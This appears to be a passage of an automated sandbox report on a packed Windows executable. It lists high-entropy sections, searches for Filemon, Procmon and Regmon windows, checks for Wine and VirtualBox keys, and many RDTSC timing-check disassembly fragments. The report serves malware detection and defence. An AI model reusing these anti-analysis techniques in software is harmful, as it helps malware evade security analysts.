        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: file.exeStatic file information: File size 1840128 > 1048576
        Source: file.exeStatic PE information: Raw size of rriqemsb is bigger than: 0x100000 < 0x197600
        Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000003.00000002.1737168672.0000000005D12000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1650571143.0000000007C70000.00000004.00001000.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 3.2.file.exe.5e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rriqemsb:EW;gdzxkufk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rriqemsb:EW;gdzxkufk:EW;.taggant:EW;
        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
        Source: file.exeStatic PE information: real checksum: 0x1c5370 should be: 0x1c4f8f
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: .idata
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: rriqemsb
        Source: file.exeStatic PE information: section name: gdzxkufk
        Source: file.exeStatic PE information: section name: .taggant
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531511B push ss; iretd 3_3_05315131
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_05313308 push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132C8 push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531514B push cs; iretd 3_3_053151F1
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053152B2 push ebp; iretd 3_3_05315329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053150BA push ss; iretd 3_3_05315131
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053152FA push edx; iretd 3_3_05315311
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053151C2 push cs; iretd 3_3_053151F1
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132EA push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_053132C8 push ecx; ret 3_3_05313309
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0531330A push ebp; ret 3_3_05313329
        Source: file.exeStatic PE information: section name: entropy: 7.9815761329960475
        Source: file.exeStatic PE information: section name: rriqemsb entropy: 7.954348593087334

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAED5 second address: 7AAED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B3F13 second address: 7B3F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D3471h], eax 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 mov edx, dword ptr [ebp+122D1C60h] 0x00000017 mov esi, dword ptr [ebp+122D2C40h] 0x0000001d popad 0x0000001e call 00007F48A0C1C539h 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B3F3F second address: 7B3F7A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F48A0C206D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F48A0C206E9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push esi 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop edx 0x0000001a pop esi 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 jp 00007F48A0C206D6h 0x00000026 pop edx 0x00000027 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4062 second address: 7B406F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4175 second address: 7B420F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 5F8B7BD4h 0x0000000e mov dword ptr [ebp+122D1EDFh], edx 0x00000014 push 00000003h 0x00000016 mov edx, 434E8659h 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D2B90h] 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007F48A0C206D8h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f mov di, CD89h 0x00000043 add edx, 209C02F1h 0x00000049 push 93B7C341h 0x0000004e push esi 0x0000004f jl 00007F48A0C206D8h 0x00000055 pushad 0x00000056 popad 0x00000057 pop esi 0x00000058 xor dword ptr [esp], 53B7C341h 0x0000005f pushad 0x00000060 mov di, 9775h 0x00000064 jmp 00007F48A0C206DCh 0x00000069 popad 0x0000006a lea ebx, dword ptr [ebp+1244AE44h] 0x00000070 call 00007F48A0C206DDh 0x00000075 mov ch, bh 0x00000077 pop edx 0x00000078 push eax 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c jnl 00007F48A0C206D6h 0x00000082 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B420F second address: 7B4233 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F48A0C1C548h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D389D second address: 7D38A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F48A0C206D6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D38A9 second address: 7D38C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F48A0C1C542h 0x00000012 jno 00007F48A0C1C536h 0x00000018 jnp 00007F48A0C1C536h 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D38C7 second address: 7D38ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F48A0C206D6h 0x00000009 jmp 00007F48A0C206E9h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3D4A second address: 7D3D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D415A second address: 7D418D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E1h 0x00000007 push eax 0x00000008 jmp 00007F48A0C206DDh 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F48A0C206DAh 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D42C6 second address: 7D42D5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4588 second address: 7D4592 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F48A0C206E7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4592 second address: 7D45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C53Bh 0x00000009 push esi 0x0000000a jmp 00007F48A0C1C543h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F48A0C1C557h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D45C3 second address: 7D45C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D489C second address: 7D48A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D48A7 second address: 7D48CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E8h 0x00000007 pushad 0x00000008 jne 00007F48A0C206D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D50BB second address: 7D50BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2932 second address: 7A2949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jne 00007F48A0C206D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F48A0C206FCh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2949 second address: 7A294F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F3DD second address: 79F3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DCEE1 second address: 7DCEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD673 second address: 7DD677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD677 second address: 7DD67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD792 second address: 7DD7A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD7A8 second address: 7DD7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2ABF second address: 7E2AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2BFA second address: 7E2C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3148 second address: 7E314E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E659F second address: 7E65BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F48A0C1C53Dh 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E65BB second address: 7E65C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E65C1 second address: 7E65C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E69F3 second address: 7E6A06 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F48A0C206D8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6A06 second address: 7E6A10 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6CD2 second address: 7E6CD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7A73 second address: 7E7A94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 jns 00007F48A0C1C53Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E78B8 second address: 7E78BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7A94 second address: 7E7AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F48A0C1C538h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 mov edi, dword ptr [ebp+122D2C74h] 0x00000026 push 00000000h 0x00000028 mov di, 85D6h 0x0000002c mov esi, dword ptr [ebp+122D2C7Ch] 0x00000032 push 00000000h 0x00000034 jmp 00007F48A0C1C549h 0x00000039 xchg eax, ebx 0x0000003a jbe 00007F48A0C1C544h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E78BC second address: 7E78E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F48A0C206D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F48A0C206EEh 0x00000013 jmp 00007F48A0C206E8h 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7AF1 second address: 7E7B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F48A0C1C536h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7B01 second address: 7E7B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F48A0C206D6h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8AA7 second address: 7E8B32 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F48A0C1C538h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F48A0C1C544h 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F48A0C1C538h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 jne 00007F48A0C1C536h 0x0000003a mov edi, dword ptr [ebp+122D2A44h] 0x00000040 push 00000000h 0x00000042 jbe 00007F48A0C1C536h 0x00000048 push 00000000h 0x0000004a xor si, 5332h 0x0000004f sub dword ptr [ebp+122D369Eh], esi 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jmp 00007F48A0C1C545h 0x0000005e push eax 0x0000005f pop eax 0x00000060 popad 0x00000061 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE6EE second address: 7EE6F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F48A0C206D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F19AD second address: 7F19B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2A55 second address: 7F2A7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007F48A0C206D6h 0x00000012 jmp 00007F48A0C206E2h 0x00000017 popad 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5AFF second address: 7F5B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBCDE second address: 7EBCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC82F second address: 7EC833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBCE2 second address: 7EBCE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC833 second address: 7EC839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0BF5 second address: 7F0BFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF98D second address: 7EF991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC839 second address: 7EC83E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6C42 second address: 7F6C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C53Bh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F48A0C1C53Ch 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0BFB second address: 7F0C26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F48A0C206E1h 0x00000008 jmp 00007F48A0C206DBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 js 00007F48A0C206EBh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F48A0C206DDh 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC83E second address: 7EC844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6C62 second address: 7F6C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFA92 second address: 7EFAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F48A0C1C540h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F48A0C1C53Ch 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC844 second address: 7EC851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6C66 second address: 7F6CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F48A0C1C538h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+122D2A24h] 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 mov dword ptr [ebp+12478EB8h], ebx 0x0000001f pop ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F48A0C1C538h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c push eax 0x0000003d pushad 0x0000003e jp 00007F48A0C1C538h 0x00000044 push edi 0x00000045 pop edi 0x00000046 push eax 0x00000047 push edx 0x00000048 push esi 0x00000049 pop esi 0x0000004a rdtsc
